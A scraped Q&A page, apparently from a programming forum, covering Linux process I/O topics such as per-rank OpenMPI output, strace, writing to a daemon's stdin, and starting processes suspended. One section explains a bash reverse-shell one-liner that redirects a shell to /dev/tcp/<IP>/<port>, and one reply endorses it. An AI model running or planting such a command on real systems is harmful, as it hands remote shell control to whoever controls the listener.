OpenMPI: have each process write to stdout - openmpi

Child processes started by mpirun redirect their output to the mpirun process, so all output ends up on one node.
Instead, I'd like each of the processes spawned by MPI to write to STDOUT on their own nodes, or to a file or named pipe.
I read the faq and tried out some things:
mpirun -host host1,host2 my_script >&1
Just redirects stdout from all hosts to stdout on the invoking node (like default). Doing
mpirun -host host1,host2 my_script
Where my_script redirects output to >&1 just captures output from processes on the invoking node.
Is there a way I can get each node to write to their local filesystems (for example) without redirecting to the invoking node's mpirun process?
Thanks.

Open MPI has the --output-file option, it is pretty close but not exactly what you are asking for.
I do not think there is a native way to achieve what you expect.
That being said, that can be easily achieved via a wrapper
For example, via the command line
mpirun --host host1,host2 sh -c 'my_script > /tmp/log.$OMPI_COMM_WORLD_RANK'
Each MPI task will redirect its stdout to /tmp/log.<id>.
An other method is to use the fork_agent
mpirun --host host1,host2 --mca orte_fork_agent /.../wrapper my_script
basically, instead of exec'ing my_script, Open MPI will exec /.../wrapper my_script and with a bit of creativity, the wrapper you have to write can do whatever you need.
Within this wrapper, you will likely want to check the following environment variables
OMPI_COMM_WORLD_SIZE
OMPI_COMM_WORLD_RANK
OMPI_COMM_WORLD_LOCAL_SIZE
OMPI_COMM_WORLD_LOCAL_RANK

Related

Get stdout from other program in Linux

I want in Linux, get the stdout of a NodeJS program that is opened, from other NodeJS program or bash.
I have the PID, or name of program and the data, put to function in real time.
Maybe touching files in /proc?
This is possible?
You can use strace -e write -p <pid> to see what output is the program writing to stdout (or other FDs) in real time. It does not show what has been written earlier and it needs a little parsing to extract clean stdout contents.
By default, it truncates shown writes to only 32 characters. To show more, use -s switch:
strace -e write -s 9999 -p <pid>

Is it possible to pass input to a running service or daemon?

I want to create a Java console application that runs as a daemon on Linux, I have created the application and the script to run the application as a background daemon. The application runs and waits for command line input.
My question:
Is it possible to pass command line input to a running daemon?
On Linux, all running processes have a special directory under /proc containing information and hooks into the process. Each subdirectory of /proc is the PID of a running process. So if you know the PID of a particular process you can get information about it. E.g.:
$ sleep 100 & ls /proc/$!
...
cmdline
...
cwd
environ
exe
fd
fdinfo
...
status
...
Of note is the fd directory, which contains all the file descriptors associated with the process. 0, 1, and 2 exist for (almost?) all processes, and 0 is the default stdin. So writing to /proc/$PID/fd/0 will write to that process' stdin.
A more robust alternative is to set up a named pipe connected to your process' stdin; then you can write to that pipe and the process will read it without needing to rely on the /proc file system.
See also Writing to stdin of background process on ServerFault.
The accepted answer above didn't quite work for me, so here's my implementation.
For context I'm running a Minecraft server on a Linux daemon managed with systemctl. I wanted to be able to send commands to stdin (StandardInput).
First, use mkfifo /home/user/server_input to create a FIFO file somewhere (also known as the 'named pipe' solution mentioned above).
[Service]
ExecStart=/usr/local/bin/minecraft.sh
StandardInput=file:/home/user/server_input
Then, in your daemon *.service file, execute the bash script that runs your server or background program and set the StandardInput directive to the FIFO file we just created.
In minecraft.sh, the following is the key command that runs the server and gets input piped into the console of the running service.
tail -f /home/user/server_input| java -Xms1024M -Xmx4096M -jar /path/to/server.jar nogui
Finally, run systemctl start your_daemon_service and to pass input commands simply use:
echo "command" > /home/user/server_input
Creds to the answers given on ServerFault

Monitoring all running process using strace in shell script

I want to monitor all the running processes using strace and when a process ends the output of the strace should be sent to a file.
And how to find every running proc PID. I also want to include process name in the output file.
$ sudo strace -p 1725 -o firefox_trace.txt
$ tail -f firefox_trace.txt
1725 would be the PID of the proccess you want to monitor (you can find the PID with "ps -C firefox-bin", for firefox in the example)
And firefox_trace.txt would be the output file !
The way to got would be to find every running proc PID, and use the command to write them in the output file !
Considering the doc,
-p pid
Attach to the process with the process ID pid and begin tracing. The
trace may be terminated at any time by a keyboard interrupt signal (
CTRL -C). strace will respond by detaching itself from the traced
process(es) leaving it (them) to continue running. Multiple -p options
can be used to attach to up to 32 processes in addition to command
(which is optional if at least one -p option is given).
Use -o to store the output to the file, or 2>&1 to redirect standard error to output, so you can filter it (grep) or redirect it into file (> file).
To monitor process without knowing its PID, but name, you can use pgrep command, e.g.
strace -p $(pgrep command) -o file.out
where command is your name of process (e.g. php, Chrome, etc.).
To learn more about parameters, check man strace.

Testing Bash Reverse Shell

I am testing a reverse shell using the tutorial found here.
I have some question about the meaning of the commands used. The command to run on the server is the following:
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 2>&1
I want to double check its meaning. Based on my understanding:
Start a bash shell
Redirect output of the shell to TCP connection <IP>:<port>
0<&1: Redirect Input from connection &1 to stdin 0
2>&1: Redirect output from stderr 2 to connection &1
Is the above correct ?
Yes, it's correct; the goal is for all three FDs -- stdin, stdout, and stderr -- to be pointing to your TCP connection.
Note that this command needs to be run in a bash compiled with /dev/tcp, which is an optional feature provided by the shell itself, not the operating system; moreover, this means that something like system(), which uses /bin/sh, typically won't work to invoke it.
For STDOUT, use 1>&1, because 2 will redirect STDERR stream.
So your command should be -
/bin/bash > /dev/tcp/<IP>/<port> 0<&1 1>&1

linux: suspend process at startup

I would like to spawn a process suspended, possibly in the context of another user (e.g. via sudo -u ...), set up some iptables rules for the spawned process, continue running the process, and remove the iptable rules when the process exists.
Is there any standart means (bash, corutils, etc.) that allows me to achieve the above? In particular, how can I spawn a process in a suspended state and get its pid?
Write a wrapper script start-stopped.sh like this:
#!/bin/sh
kill -STOP $$ # suspend myself
# ... until I receive SIGCONT
exec $# # exec argument list
And then call it like:
sudo -u $SOME_USER start-stopped.sh mycommand & # start mycommand in stopped state
MYCOMMAND_PID=$!
setup_iptables $MYCOMMAND_PID # use its PID to setup iptables
sudo -u $SOME_USER kill -CONT $MYCOMMAND_PID # make mycommand continue
wait $MYCOMMAND_PID # wait for its termination
MYCOMMAND_EXIT_STATUS=$?
teardown_iptables # remove iptables rules
report $MYCOMMAND_EXIT_STATUS # report errors, if necessary
All this is overkill, however. You don't need to spawn your process in a suspended state to get the job done. Just make a wrapper script setup_iptables_and_start:
#!/bin/sh
setup_iptables $$ # use my own PID to setup iptables
exec sudo -u $SOME_USER $# # exec'ed command will have same PID
And then call it like
setup_iptables_and_start mycommand || report errors
teardown_iptables
You can write a C wrapper for your program that will do something like this :
fork and print child pid.
In the child, wait for user to press Enter. This puts the child in sleep and you can add the rules with the pid.
Once rules are added, user presses enter. The child runs your original program, either using exec or system.
Will this work?
Edit:
Actually you can do above procedure with a shell script. Try following bash script:
#!/bin/bash
echo "Pid is $$"
echo -n "Press Enter.."
read
exec $#
You can run this as /bin/bash ./run.sh <your command>
One way to do it is to enlist gdb to pause the program at the start of its main function (using the command "break main"). This will guarantee that the process is suspended fast enough (although some initialisation routines can run before main, they probably won't do anything relevant). However, for this you will need debugging information for the program you want to start suspended.
I suggest you try this manually first, see how it works, and then work out how to script what you've done.
Alternatively, it may be possible to constrain the process (if indeed that is what you're trying to do!) without using iptables, using SELinux or a ptrace-based tool like sydbox instead.
I suppose you could write a util yourself that forks, and wherein the child of the fork suspends itself just before doing an exec. Otherwise, consider using an LD_PRELOAD lib to do your 'custom' business.
If you care about making that secure, you should probably look at bigger guns (with chroot, perhaps paravirtualization, user mode linux etc. etc);
Last tip: if you don't mind doing some more coding, the ptrace interface should allow you to do what you describe (since it is used to implement debuggers with)
You probably need the PID of a program you're starting, before that program actually starts running. You could do it like this.
Start a plain script
Force the script to wait
You can probably use suspend which is a bash builitin but in the worst case you can make it stop itself with a signal
Use the PID of the bash process in every way you want
Restart the stopped bash process (SIGCONT) and do an exec - another builtin - starting your real process (it will inherit the PID)

Resources